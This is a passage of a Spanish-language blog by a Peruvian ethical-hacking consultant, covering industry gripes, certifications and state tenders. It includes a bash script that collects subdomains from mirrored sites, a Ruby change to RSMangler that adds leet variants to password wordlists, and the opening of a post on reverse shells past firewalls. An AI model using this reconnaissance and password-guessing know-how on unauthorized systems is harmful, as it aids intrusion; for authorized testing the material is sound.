<li><span style="font-family: Arial, Helvetica, sans-serif;">Sigo insistiendo : el mejor equipo de hackers éticos peruanos esta en Open-Sec. De hecho, CREO que solo hay 2 o 3 equipos en Perú y somos el más numeroso y con más años de experiencia. Esto no es "panudearse" es solamente el reconocimiento a llevar más de 7 años dedicados a evaluar la seguridad de una cantidad y tipo de organizaciones de Perú, Ecuador y US que no veo en otros. Es más, es un reconocimiento que me alcanza apenas un poco en lo personal porque es el trabajo de un grupo de gente que vive todo el día y todos los días cuestionando la seguridad y analizando vectores de ataque para hacer evaluaciones que son pagadas por nuestros clientes y que reciban recomendaciones que de verdad los ayuden a resolver sus problemas de seguridad informática. Por eso sacamos el eslogan de <b>They run automated tools, We have ETHICAL HACKERS</b> puesto que si fuesemos meros "corredores de herramientas", creanme que estariamos bien jodidos y andariamos haciendo otras cosas más para ganar dinero.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Jalando el tema en base a lo anterior, fuimos el único equipo de peruanos que desarollo una herramienta de hacking y tuvimos que parar su desarrollo y sacarla del aire por esa absurda "Ley de Delitos Informáticos". Desarrollar Tumi fue una experiencia inolvidable porque no era otra tool para "no-pensantes" ni solamente una que haga "information gathering", hacia todos los pasos de un pentesting, era ligera, estaba hecha en Python, era 100% modificable por cualquiera y nos ayudo a demostrarnos a nosotros mismos de lo que eramos capaces. Acuerdense de Ratatouille y lo que decia el Chef Gusteau : cualquiera puede cocinar.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">No puedo dejar de mencionar que ninguno de los dos puntos anteriores fue apreciado por dos clientes y un potencial cliente que decidieron optar por otro proveedor para servicios de hacking porque costaban la mitad que nosotros. Lo que me dejo esto como experiencia es que hay clientes que no saben medir el nivel de servicio que reciben (creanme que hemos hecho una auto-evaluación para buscar nuestras fallas) y eso es falla nuestra por no saber "educar" al cliente. En el otro caso del potencial cliente, fue de lo más absurdo : se quejaron que el proveedor del año pasado les hizo una pésima evaluación, pero, como nosotros eramos más caros, tomaron al del año pasado.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Lo anterior me lleva a comentar que sigo apreciando muchisimo el desarrollo de Ecuador como país, se nota que los cambios de verdad no solo se dan por tener más dinero si no por hacer que la gente cambie y vea las cosas de forma diferente. Claro, para eso se requiere un líder como Rafael Correa, pero, un líder sin ciudadanos con amor por su país y propósito de enmienda no serviría. Ecuador es un excelente país!</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Igual, nuestra base es Perú y en el 2013 crecimos un 30% con respecto al 2012.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Este año fue de eventos, participe en el CSI 2013 de Colombia y en Campus Party Quito 2013. Siempre seguiré elogiando a los ecuatorianos : 1:30 am y la gente seguía participando en el taller de Scripting para Pentesters que estabamos dictando con Camilo y Mauricio. También, este año me opuse a la forma en que organizaron LimaHack 2013 y decidí que en lugar de solamente criticar, debía hacer algo diferente organizando <b>PERUHACK 2013</b> (<a href="http://peruhack.org/">http://peruhack.org</a>). Con el apoyo de muchas personas (Grover Cordova, Jesús Hernandez, John Vargas, Marcia Sifuentes, Jean del Carpio, Camilo Galdos, Cesar Flores, Miguel Guerra, Renatto Gonzales, Pablo Munar), se consiguió tener un evento muy bueno dirigido a profesionales de la seguridad informática. De hecho, tuvimos unas charlas excelentes, muy técnicas y un invitado desde España : Lorenzo Martinez (<a class="twitter-atreply pretty-link" href="https://twitter.com/lawwait" style="background-color: white; color: #038543; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px; text-decoration: none !important;"><s style="color: #67b58e; text-decoration: none;">@</s>lawwait</a>).</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">También, este año leí y escuche de tantas cosas que me parecen pura venta como el "pentesting by design" que es una suerte de mix de automatizado y semi-automatizado, pero, que para mi es otro rollo comercial más como el "cloud computing".</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Sigo siendo fanático de nmap y sqlmap, será por el "map" ? Yo creo que es porque ambas me permiten modificarlas según lo necesite y con ello pasar por alto las "protecciones". Antes solía jugar con Metasploit, también, pero, este año apenas hice algo con vbsmem para que funcionen varios CSA.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Este año revise varios informes sobre APT para ver que tan ciertos y validos eran. La verdad, hay demasiadas cosas cuestionables en esos informes que nos presentan a los chinitos como los culpables de todos los ataques y encima como poco inteligentes en estas lides.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">El 2014 arrancará definiendo vectores de ataque para todos los componentes del sistema de BITCOINS.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">La publicación de advisories no es algo que hagamos bien, de hecho, encontramos un 0day en un IPS de WatchGuard, pero, dejamos la redacción del advisory para después de terminar el pentest en el que andabamos inmersos y para ese momento, ya no era un 0day. LENTOS!!</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Me he pasado la última semana pensando en qué cosa podría poner en este post que sea 100% técnica, es decir, un script o una técnica, pero, todas estan reñidas con la "Ley". Finalmente, pense que cualquiera que lea este post caerá en una de dos categorías : el que lee bien (1 ó 0) y el que interpreta las cosas como le da la gana y el hecho que ponga o no ponga algo "técnico" no cambiará ese hecho.</span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Así que deseo a todos, amigos y enemigos, peruanos y extranjeros, cualquiera que lea este post : que el 2014 sea un año MUY BUENO para Uds.!</span></div>
WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-38787186855597240822013-06-19T18:12:00.002-05:002013-06-19T18:13:58.299-05:00La última certificación que obtuve y ahi paro : Offensive Security Certified Professional (OSCP)<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-RSSNa-yMpro/UcI6rXaqEuI/AAAAAAAAAa4/yxT3OG9bJH8/s1600/Email_Resultado_OSCP.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="231" src="http://2.bp.blogspot.com/-RSSNa-yMpro/UcI6rXaqEuI/AAAAAAAAAa4/yxT3OG9bJH8/s400/Email_Resultado_OSCP.png" width="400" /></a></div>
<br />WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-88879000394609153882013-01-19T15:04:00.000-05:002013-01-25T00:15:05.640-05:00Algunos puntos para los cuales 140 caracteres no son suficientes...Enero 2013Hay una serie de temas que me tienen hace meses pendiente de escribir y el querido Twitter solo me dejaria escribir a puchitos, asi que aca van, cortos, pero, van :<br />
<br />
---> Hackers :<br />
<br />
Wow! Parecen conejos! Los hackers se multiplican, sobre todo esos que leen mucho y que saben mucho!<br />
Seguro que alguien dira que yo solo alucino a los de Open-Sec (por años somos el unico equipo de hackers peruanos que solamente nos dedicamos a esto y que nos va muy bien), pero, mas alla de mis "preferencias" por este team, tambien saben que siempre me excluyo de esa elite de verdaderos hackers (tal vez aun arrastro algo de linuxero donde no se aceptan las autocalificaciones y cada que alguien dice que soy hacker, digo : no, solo soy parte de un team de hackers DE VERDAD.<br />
Pero, eso de "leen mucho" es cachoso porque leen mucho por Internet, prueban poco, investigan nada y hasta hacen tutoriales y videos y cuanta vaina puedan hacer para obtener el "reconocimiento popular".<br />
Tambien, eso de "saben mucho" es cachoso porque se afanan tanto en demostrar lo mucho que saben que pierden el sentido basico de cualquiera que este metido en esto : nunca sabras mucho de todo!<br />
Lo que si creo que falta es resaltar a los aficionados y profesionales que si estan haciendo las cosas MUY BIEN sin importar su nivel de conocimientos porque pueden estar iniciando, madurando o perfeccionando.<br />
Tambien, se que alguien pensara, luego de lo que sigue, "claro, es su pata", pero, que diablos! Por que Andres Morales Zamudio no es una mega-estrella del mundo del hacking a nivel internacional si sabe muchisimo mas que varios argolleros que andan pululando por los eventos de hacking en Latino America ?!<br />
Facil respuesta : Andres no se autoproclama genio ni tiene una banda de amigos que lo haga por el, Andres no tuitea frecuentemente, tampoco bloguea re-fritos y menos "crea" toolz refritas ni anda pidiendo que lo inviten a dar charlas a eventos.<br />
Y asi puedo nombrar un buen grupo de gente peruana : Cesar Cuadra, Alfredo García, Mauricio Urizar, Camilo Galdos, Juan Oliva, Hernan Parodi (todos los anteriores son Open-Sec), Fernando Flores, Oscar Martinez, Mauricio Velazco (99.9% still Open-Sec guy), casi todos los que exponen en LimaHack (aunque tambien caen por ahi varios lammers, otros alucinados y otros que se presentan, pero, la charla la hace otro) y seguro me faltan varios nombre, PERO, tambien omito otros varios adrede.<br />
Si, ya se, suena a amargura todo esto, pero, ojo, no es por mi, es porque siempre andamos, los peruanos, alucinando lo que venga de fuera y aunque pasa asi en otros paises (lo vemos cuando nos toca salir de nuestro querido pais), aca es alucinante.<br />
<br />
--->Posts re-fritos :<br />
<br />
Quieres ser famoso como hacker ? Bloguea re-fritos, osea, esas cosas que ya se publicaron miles de veces, pero, que tu publicitaras como si recien se hicieran, como obras ineditas.<br />
Solamente tomen un momento para buscar en Google textos similares o identicos, no se limiten a buscar en Español, busquen en Ingles y otros idiomas, total, hay traductores everywhere.<br />
Hace poco leia el reclamo de uno de estos "hackers" sobre que otro "hacker" habia publicado cosas suyas sin el debido "reconocimiento", el segundo "hacker" pide disculpas por la omision y a mi me da risa porque he encontrado mas de un texto del primer "hacker" (el ofendido) que son copia fiel de otros posts hechos en Ingles, claro, pone otros screenshots, señal que al menos probo lo que decia el blog original.<br />
<br />
--->Hackers certificados :<br />
<br />
De hecho que los "balotarios" estan haciendo un buen trabajo, sobre todo en las certificaciones que no actualizan sus bases de datos de preguntas.<br />
Cada vez hay mas gente certificada sin entrenamiento (100% aceptable), pero, sin experiencia previa que determine un nivel de conocimientos como para aprobar un examen de certificacion.<br />
Y ya que la economia peruana es de las mejores, hay dinero para invertir en examenes asi sean caros.<br />
Siento que terminare dando la razon a muchas personas que me decian que el asunto de las certificaciones perderia valor en el tiempo porque lejos de ser un factor de medicion, se convierte en un factor de engaño.<br />
Peor aun cuando hay gente que ya perdio la certificacion y no tienen la honestidad de comunicarlo y aun se presentan como gente certificada.<br />
Por ejemplo, casi nadie sabe que si uno mantiene vigente la certificacion de C|EH, hay un certificado adicional que demuestra dicha vigencia.<br />
Tampoco saben que otros como Mile2 y GIAC mantienen bases de datos publicas donde se puede ver si la certificacion de la persona es vigente o no.<br />
<br />
<br />
--->Hackeando a los Hackers :<br />
<br />
Esta es breve :<br />
<br />
1. Debes aprender Linux, no puedes ser hacker usando solo MS Windows, no seas payaso!<br />
2. Debes aprender Ingles, al menos, de lo contrario, como diablos siquiera leeras un readme ?! Menos pensar en modificar la tool o crear una.<br />
3. Debes tener perfil de desarrollador para llegar a un nivel alto, de lo contrario, estaras limitado a ser un buen profesional (osea, hoy haces hacking, mañana instalas un firewall, pasado eres un gerente sin memoria tecnica).<br />
4. Debes leer mucho.<br />
5. Debes investigar mucho.<br />
6. No debes tener horario de oficina.<br />
7. Penetrar no es meterse a un server, es meterse a todos los que puedas incluido el que esta apagado! (medio broma, facil es un server con wake-on-lan).<br />
8. Debes saber mas que tus toolz.<br />
9. Tus toolz son necesarias, aprende a usarlas bien, cuidalas, quieralas, mejoralas, mandalas al asilo cuando creas que ya son viejas (algun dia las podras recoger para darles un paseito).<br />
10. Aceptalo: tendras que trabajar en equipo! <br />
<br />
--->Concursos del Estado Peruano :<br />
<br />
Estos son mas gracioso cada vez, siempre hacen la lista de Papa Noel, se da el concurso y siempre gana el mas barato. Teniendo empresas como aquella (viene de otro continente) que se baja los pantalones a cada rato, es facil conseguir servicios baratos.<br />
Solo conozco una entidad donde hay una persona que sabe mucho y una vez que dije algo asi, se molesto porque me dijo que me iba directamente contra el (esa empresita acababa de ganar un concurso en su entidad). Pero, la cosa es que los tecnico no deciden, aceptenlo!<br />
Ayer y hoy me llaman 2 personas por un concurso en una entidad del Estado donde no quieren que gane el unico postor que se presento. Como ?! Son conscientes de unos antecedentes negativos de dicho postor, pero, nunca se animaron a divulgarlo por ser "polites", por no ser parte de un chisme o porque la hipocresia gana al peruano y siempre quiere ser nice.<br />
Ahora, corren a pedir ayuda para impedir que le den la buena pro a ese postor, que buena vaina!<br />
Leo las bases, no veo el nombre del postor, "miro mas alla de lo evidente" y zas! salen sus siglas, URL, talla del brasiere, talla de correa, etc. Y ahora no quieren que gane ?! No pues! Dejenlo que gane y exijanle que haga el servicio como debe ser!<br />
<br />
--->Algo técnico para no quedar sin demostrar :<br />
<br />
No es perfecto, pero, me sirve siempre :<br />
<br />
#!/bin/bash<br />#Uso : xtracthosts.sh dominio wget|directorio archivo_urls<br />#dominio como acme.com (sin nombre de host ni cname)<br />#la palabra wget o el nombre del directorio de una descarga previa<br />#archivo de texto con urls como http://www.acme.com y https://www.acme.com<br />#Si, en mi desorden, publique primero una version que no es la ultima<br />if [ $2 = "wget" ]; then<br /> wget -r --no-check-certificate -i $3<br />fi<br />if [ $2 != "wget" ]; then<br /> cd $2<br />else<br /> cd www.$1<br />fi<br />url="http|https://*.$1"<br />grep -R -E "$url" * | cut -d "/" -f 4 | cut -d '"' -f 1 | grep $1 | cut -d "'" -f 1 | sort -u > ../hosts-$1.txt<br />cat ../hosts-$1.txt<br />cd ..WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-73725863671218311562012-07-28T23:05:00.000-05:002012-07-28T23:05:03.243-05:00Comentarios a unos "tips" sobre C|EHBuceando un poco me encontre con un post de una persona cuyo nombre omito, pero, encontre algunas inexactitudes y le he posteado un comentario. Como no estoy seguro que lo publique, lo hare en mi blog :<br />
<br />
XYZ, hola.<br /><br />Algunas preciisones :<br /><br />1. La certificacion de C|EH no expira despues de 2 años, puedes ver la informacion detallada de esto en https://cert.eccouncil.org/ece-policy<br />Tambien, una mirada al C|EH Handbook ayudara con mas detalles https://cert.eccouncil.org/wp-content/uploads/2011/11/CEH-Candidate-Handbook-v1.6-13022012.pdf<br /><br />2. Hay varias opciones locales de entrenamiento autorizado para prepararse para un examen de C|EH y, hasta donde, son : ETEK, Digiware, BS Grupo y Cyttek (que es una Academia autorizada ECA y ofrece una forma diferente de entrenamiento de EC Council, en resumen: un programa con varias certificaciones, con mas tiempo, menos costo, otro material)<br />
<br />3. Sugiero que retires ese enlace al final de la respuesta al comentario porque de no ser material meramente informativo, estarias faltando al codigo de etica de EC Council y perderas automaticamente la certificacion y no podras aplicar a ninguna otra. En el C|EH Handbook lo puedes ver tambien.<br /><br />Saludos,WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-22418016655459022242012-06-08T10:05:00.003-05:002012-06-08T10:23:48.528-05:00GuayaquilHack 2012A casi un año de mi último post, confirmo lo que siempre pensé : sí alguien bloguea con mucha frecuencia, es porque no trabaja mucho y a mi me pasa cada vez más que el trabajo no me deja tiempo para bloguear y, definitivamente, el micro mundo de <a href="https://twitter.com/#%21/wcu35745">Twitter</a> o Linkedin resultan más rápidos.<br />
<br />
También, quiero dejar registro que mi vida técnica no ha parado y muestra de ello es que me animé a subir un par de <a href="http://www.slideshare.net/wcuestas/">presentaciones</a> que hice en varios eventos y un webinar.<br />
<br />
Sin embargo, es mejor hacerlo en vivo y directo y por eso organizamos GuayaquilHack 2012. Hoy en día abundan los eventos de seguridad, cada vez más se tienen eventos de in-seguridad y también hay mucha oferta de entrenamientos de hacking. Nosotros mismos tenemos uno llamado OSEH que promovemos de alguna forma, pero, hace tiempo queriamos hacer dos talleres de tipo avanzado e introducir uno nuevo.<br />
<br />
Los talleres avanzados corresponden a Web Application Hacking y Exploit Development. El introductorio corresponde a Computación Forense.<br />
<br />
Decidimos lanzarlos en Guayaquil porque estaremos dictando 2 cursos de Ethical Hacking en la ESPOL (como todos los años) y lo denominamos GuayaquilHack 2012 porque esperamos que sea el inicio.<br />
<br />
Como dicen, las imágenes valen más que mil palabras :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-EAbN2ztEvss/T9IUWWv3yrI/AAAAAAAAAY0/i6hI5ijmcU4/s1600/GuayaquilHack2012-WebAppHacking.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="296" src="http://2.bp.blogspot.com/-EAbN2ztEvss/T9IUWWv3yrI/AAAAAAAAAY0/i6hI5ijmcU4/s400/GuayaquilHack2012-WebAppHacking.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/--vH9NhbuF8w/T9IUhyGdxeI/AAAAAAAAAY8/vxmbqytkuQQ/s1600/GuayaquilHack2012-Forensia.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="298" src="http://1.bp.blogspot.com/--vH9NhbuF8w/T9IUhyGdxeI/AAAAAAAAAY8/vxmbqytkuQQ/s400/GuayaquilHack2012-Forensia.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-phBOe3NNdV8/T9IUw4NU57I/AAAAAAAAAZE/jGy-K12K9Tc/s1600/GuayaquilHack2012-Exploits.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="296" src="http://4.bp.blogspot.com/-phBOe3NNdV8/T9IUw4NU57I/AAAAAAAAAZE/jGy-K12K9Tc/s400/GuayaquilHack2012-Exploits.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-6316552165545106542011-07-21T23:53:00.002-05:002011-07-22T00:15:03.696-05:00RSMangler personalizado para generar mas palabras h4x0rEl otro dia uno de los colegas en Open-Sec me hablaba sobre su fascinacion con CUPP (<a href="http://www.remote-exploit.org/?p=546">http://www.remote-exploit.org/?p=546</a>) y como hacia algo que RSMangler no hace por default : generar palabras en h4x0r y someterlas a las mismas combinaciones que hace con las palabras normales.<br /><br />Cuando uno pasa palabras de entrada a RSMangler y le pide generar palabras h4x0r a partir de las originales (opcion leet que esta activa por default), solamente genera una palabra h4x0r por cada palabra original y no la combina con otros valores como hace con las palabras originales y normales (numeros, letras, años, caracteres especiales). CUPP si lo hace.<br /><br />Entonces, aparecio el reto y, en realidad, solo posteo esto para que se aprecie el valor del software abierto que permite que uno siga usando su aplicacion favorita solamente haciendo pequeños cambios al codigo fuente (en este caso es mas patente aun porque RSMangler es un script en Ruby).<br /><br />La seccion de programa que hay que adicionar antes del loop de generacion es :<br /><br /><span style="font-weight: bold; font-style: italic;">file_words.each { |y|</span><br /><span style="font-weight: bold; font-style: italic;"> wordlist << y.gsub(/e/, "3").gsub(/a/, "4").gsub(/o/, "0").gsub(/i/, "1").gsub(/l/, "1")</span><br /><span style="font-weight: bold; font-style: italic;">}</span><br /><br />wordlist.each { |x|<br /> results << x<br /><br /> results << x+x if double<br /> results << x.reverse if reverse<br /> results << x.capitalize if capital<br /> results << x.downcase if lower<br /> results << x.upcase if upper<br /> results << x.swapcase if swap<br /> results << x + "ed" if ed<br /> results << x + "ing" if ing<br /><br /> if common<br /> (Continua el loop de generacion).<br /><br />Como se ve, genera las palabras h4x0r adicionandolas a la lista original de forma que cuando entra al loop de permutaciones y generacion de palabras, tambien son afectadas, es decir, combinadas con los otros valores. De esta forma, esta funcionalidad hace lo mismo que CUPP.<br /><br />Tambien es importante resaltar, por si no se aprecio, que la porcion de codigo necesaria ya se encuentra en el programa y solamente se aplica antes del loop de generacion.WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-22982329221838242072011-07-21T23:46:00.002-05:002011-07-21T23:53:09.930-05:00NTP 17799 de cumplimiento obligatorio con fecha limite 31.12.2012Esta norma ha hecho mucho bien a las organizaciones del Estado peruano porque ha hecho que esten mas concientizados, no importa que la mayoria ni siquiera ha leido el documento.<br /><br />Tambien ha sido positivo porque al amparo de dicha norma, se han hecho evaluaciones de seguridad y negativa porque ha sido utilizada para justificar compras de productos que ni los usan o los usan mal.<br /><br />Ahora, nuevamente se pone una fecha limite de cumplimiento como se hizo hace años. Que paso con los que no cumplieron ? Nada! Quien evalua el cumplimiento ? Nadie!<br /><br />El Decreto no hace otra cosa que ser majadero al pedir cumplir con tener un plan de seguridad como si alguna organizacion en el mundo pudiese tomar la NTP 17799 (ISO 27002) y cumplir al 100% con todo lo expuesto en ella. Eso implica desconocer el estado evolutivo (involutivo en algunas entidades como la ONGEI) de toda organizacion y que eso es precisamente la base de tener un estandar que si es certificable (evaluable, comprobable, controlable) como el ISO 27001.<br /><br />Definitivamente, yo ando pensando que solamente "la empresa privada" es la asesora de ONGEI y que cosas como esta obligatoriendad podrian estar apuntando a dejar sembradas opciones de negocio para esa "empresa privada". Espero equivocarme y que esto no sea asi.<br /><br />Espero tambien, que el proximo gobierno ponga orden y defina una Oficina Nacional de Seguridad que defina la estrategia nacional de seguridad de la informacion y seguridad informatica.WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-57967789605271734542011-07-14T17:32:00.002-05:002011-07-14T17:39:00.730-05:00Resultados del Concurso en SUNARP<div style="text-align: justify;">La información esta en el web de SEACE y aunque no es sopresa el postor que obtuvo la buena pro, si es de particular interes una nota colocado en el cuadro de calificación técnica que dice :<br />"(*) El Certificado CISSP correspondiente al SR. Juan Pablo Baby fernandez, se encuentra expirado a mayo de 2011, por lo que el postor no acredita contar con 02 profesionales con certificación CISSP."<br />Qué pasó? Otra vez no se dieron cuenta que presentaban un certificado expirado ? Presentaron un C|EH (hasta donde se, la persona mencionada esta certificada como tal), pidieron el certificado que muestre que esta vigente su certificación y que mantiene sus 120 ECE por año ?<br />La verdad es que estos puntos determinan la calidad de postor, proveedor y consultores y por ello es que debería ser revisado cuidadosamente.<br />Y qué pasó con los otros que participaron en el estudio de mercado e incluso en el proceso mismo ? Por qué finalmente no cotizaron ? No calificaban ?<br /></div>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-28457574217194371682011-07-08T11:56:00.002-05:002011-07-08T12:20:04.550-05:00Se vende cebo de culebra...ah! y tambien inventamos metodologias y certificaciones internacionales de prestigio!Parece que existe una fuente inagotable de ganas de hacer que nuestras entidades del Estado aparezcan como las más desinformadas de este planeta Tierra.
<br />
<br />En unos Terminos de Referencia pude observar el otro dia que pedian cumplir con las siguientes metodologias :
<br /><ol><li>Open Source Security Testing Methodology</li><li>SANS Institute Security Testing Best Practices</li><li>CERT Security Testing Best Practices</li><li>NIST Security & Risk Management Best Practices</li><li>NIST Special Publication 800-115</li><li>Open Web Application Security Project
<br /></li></ol> <meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"> <title></title> <meta name="GENERATOR" content="OpenOffice.org 3.2 (Linux)"> <style type="text/css"> <!-- @page { margin: 2cm } P { margin-bottom: 0.21cm } --></style>Lo terrible de este requerimiento es que las numero 2, 3 y 4 NO EXISTEN. Una rapida busqueda por Internet (Google, Bing y entrando a los sitios de cada organizacion) nos muestra unicamente una presentacion hecha por Deloitte en Europa.
<br />
<br />Luego, en otros Terminos de Referencia, para garantizar que los evaluadores tengan un nivel de conocimiento adecuado se exigen certificaciones y esto es 100% correcto y adecuado. Lo gracioso y tragi-comico es que a la par que las certificaciones de ISC2, ISACA, EC Council, Offensive Security, GIAC, Mile2 ponen dos mas bien particulares :
<br /><ul><li>eCPPT que es una bastante nueva y que se esta empezando a difundir. No se tiene informacion de la cantidad de personas certificadas en el mundo, pero, se que al menos aca hay una persona certificada.</li><li>SOHP Stack Overflow Hacking Professional que, despues de este post, por fin vera la luz del mundo...sencillamente esta certificacion NO EXISTE o, si existe, debe ser tan reservada y privada que solamente su poseedores saben de su existencia. Esto es una burla tremenda que equivaldria a quere posicionar el Open-Sec Ethical Hacker al nivel de las certificaciones de EC Council, GIAC, Offensive Security, Mile2 e incluso la de eCPPT!</li></ul>Por esas razones es que es post inicia diciendo "Se vende cebo de culebra..." porque eso les venden CASI TODOS a las entidades del Estado.
<br />
<br />El problema a resolver es la falta de conocimiento de las personas que elaboran estas especificaciones en el Estado, pero, me preocupa mas la falta de etica de quienes les plantean exigir cosas que no existen y eso es una BURLA al intelecto.
<br />
<br />Y ojo que si la existencia e internacionalizacion de las certificaciones determina que puedan considerarse como garantia para servicios de ethical hacking, entonces, consideremos al OSEH porque tiene mas de 250 personas certificadas entre Perú, Ecuador y Honduras. Algo que no haremos porque no nos dedicamos ni a la educacion y a certificar personas como core de nuestro negocio.
<br />
<br />Apliquen metodologias de verdad! Vayan y saquen certificaciones de alto nivel! No tengan miedo! No se burlen del intelecto de las personas!
<br />
<br />Buen fin de semana!
<br />
<br />WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com4tag:blogger.com,1999:blog-8620588.post-81552152355213287862011-07-01T01:00:00.003-05:002011-07-01T01:41:59.232-05:00Proceso publico en SUNARP : S/.171,850 por un ethical hacking tradicional a 97 hosts (aproximadamente)<div style="text-align: justify;">No pensaba expresarme publicamente al respecto, pero, dados mis posts pasados y el comentario a la nota de ISSA Perú, no puedo dejar pasar esta equivocada forma de contratar un servicio de ethical hacking.<br /><br />Se trata de un servicio tradicional de ethical hacking para aproximadamente 97 hosts. En forma interna (65) y externa (32). Dejare el tema monetario para el final.<br /><br />A los consultores se les exige ser Ingenieros Titulados con 5 años de experiencia laboral unicamente sin especificar que tipo de experiencia. Lo primero es exigido por el dichoso Reglamento de Contrataciones y Adquisiciones como dije en un post anterior, PERO, no deberia exigirse experiencia en ethical hacking cuando menos ?<br /><br />Vuelvo a hacer notar que deberian analizar el mercado local y ver cuantos ingenieros titulados estan metidos en temas de ethical hacking.<br /><br />Luego, como certificaciones se exigen algunas referidas a seguridad de la informacion y no sobre ethical hacking y/o penetration testing que son respecto a SEGURIDAD INFORMATICA. No existe una sola persona en SUNARP que sepa esto ? Donde esta la ONGEI con sus expertos en seguridad y su apoyo de la empresa privada que no los asesora ? Para este proceso estuvo convocado un proveedor que tuvo la actitud honesta y valiente de decirles por email que no estaban haciendo un proceso que otorgue valor a la entidad y que hicieron ? Sencillamente, lo ignoraron (iniciales otra vez MC de PC, no fue nadie de Open-Sec porque ya habiamos visto fallas hace tiempo en este proceso).<br /><br />La unica certificacion que se considera para dar puntaje adicional es la de C|EH, pero, recibe el mismo puntaje que una de CISSP o CISA. Por favor! A mis amigos que tienen certificaciones como esas y a los que ademas tienen sobre hacking : puede una certificacion de CISSP, Lead Auditor 27001, Cobit-F o CISA garantizar que el consultor hara una buena labor de hacking ?! NO! Grande, mayusculo y rotundo.<br /><br />Y por ultimo, el precio basado en un estudio de mercado que parece haber sido hecho de forma mas consciente y responsable que otros que he podido apreciar (algunos no ponen ni el nombre de las empresas que participaron en dicho estudio). Pero, aceptar que se ponga un monto referencial de S/.171,850 por hacer ethical hacking a 97 hosts ?! Poco mas de S/.1,770 soles por host!! Wow!<br />Para una mejor comprension de las tasas : comprar un servicio de un reconocido como SAINT para la parte externa les salia mucho mas barato : menos de US$3,200 por los 32 hosts externos! <a href="http://www.saintcorporation.com/products/order.html">WebSAINT PRO</a><br />Ni siquiera se piden comprobaciones manuales en todos los hosts, con lo cual, pasara lo que paso en un cliente : llegan llenos de appliances y software automatizado, lo corren, elaboran reportes tambien automatizados y 2 meses despues se les mete un intruso por una vulnerabilidad que el consabido "ethical hacking" no encontro!<br /><br />Mas aun, durante el estudio de mercado y la bases publicadas no se presenta la cantidad de hosts a evaluar y se hace de conocimiento publico esta informacion en la etapa de consultas y observaciones. Quiere decir que cuando pidieron las cotizaciones si indicaron la cantidad de hosts y no la colocaron en las bases ? O es que los proveedores que cotizaron para ese estudio de mercado se lamieron el dedo, lo expusieron al aire y zas! se les vino el numero magico a la mente!<br /><br />Lamentablemente, quienes deberian manifestarse se quedan callados en una sociedad hipocritamente condescendiente donde, los que se manifiestan en contra de estos atropellos al intelecto, son calificados de conflictivos.<br /><br />Y por si acaso, como puede parecer a mas de uno que esta nota es una piconeria porque no dieron valor a la experiencia y certificaciones de hacking, recibi la invitacion a participar en el proceso por parte de un postor y me negue porque no estoy de acuerdo en participar en un proceso que cuestiono.<br /><br />Saludos!<br /></div>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-78272730332827497192011-06-28T14:22:00.001-05:002011-06-28T14:25:17.323-05:00Mas sobre Anonymous en PerúUn comentario mio a una excelente nota escrita en ISSA Perú por Roberto Puyo<br /><a href="http://issaperu.org/?p=445#comment-40">http://issaperu.org/?p=445#comment-40</a>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-60422211571318435972011-06-23T23:13:00.003-05:002011-06-23T23:50:01.851-05:00Técnico : SSH port forwarding trianguladoNecesito sacarme el clavo con esto de no bloggear hace tiempo algo técnico :<br /><br />Uno de los problemas que deben enfrentar un atacante al establecer conexiones desde Internet es pasar por los filtros de entrada/salida impuestos por los firewalls.<br />Casi siempre encontramos que las conexiones de entrada a la red estan filtradas y, por ejemplo, un servidor web comprometido solo expone TCP 80 y si acaso, 443. Como tener un shell hacia ese equipo ?<br /><br />La respuesta conocida desde hace años es que se debe establecer un shell reverso y para existen desde el venerable netcat hasta su versión moderna ncat y pasando por el querido MetaSploit. Algo que también se puede usar es reDuh y, por supuesto, ssh. Hay varias guías que indican como hacerlo, pero, no he encontrado una en Español latino (o no 